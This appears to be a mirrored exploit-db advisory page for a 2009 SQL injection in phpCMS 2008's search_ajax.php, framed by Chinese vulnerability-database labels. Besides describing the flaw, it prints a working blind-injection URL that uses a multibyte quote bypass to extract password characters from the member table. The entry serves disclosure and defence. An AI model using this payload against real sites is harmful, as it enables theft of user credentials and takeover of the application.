https://www.exploit-db.com/exploits/32873
phpCMS 2008 - 'search_ajax.php' SQL Injection






漏洞ID | 1057566 | 漏洞类型 | |
发布时间 | 2009-03-17 | 更新时间 | 2009-03-17 |
![]() |
N/A | ![]() |
N/A |
漏洞平台 | PHP | CVSS评分 | N/A |
|漏洞来源
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/34225/info
PHPCMS2008 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Versions prior to PHPCMS2008 2009.03.17 are vulnerable.
http://www.example.com/ask/search_ajax.php?q=s%E6'/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636D73)>52%23
检索漏洞
开始时间
结束时间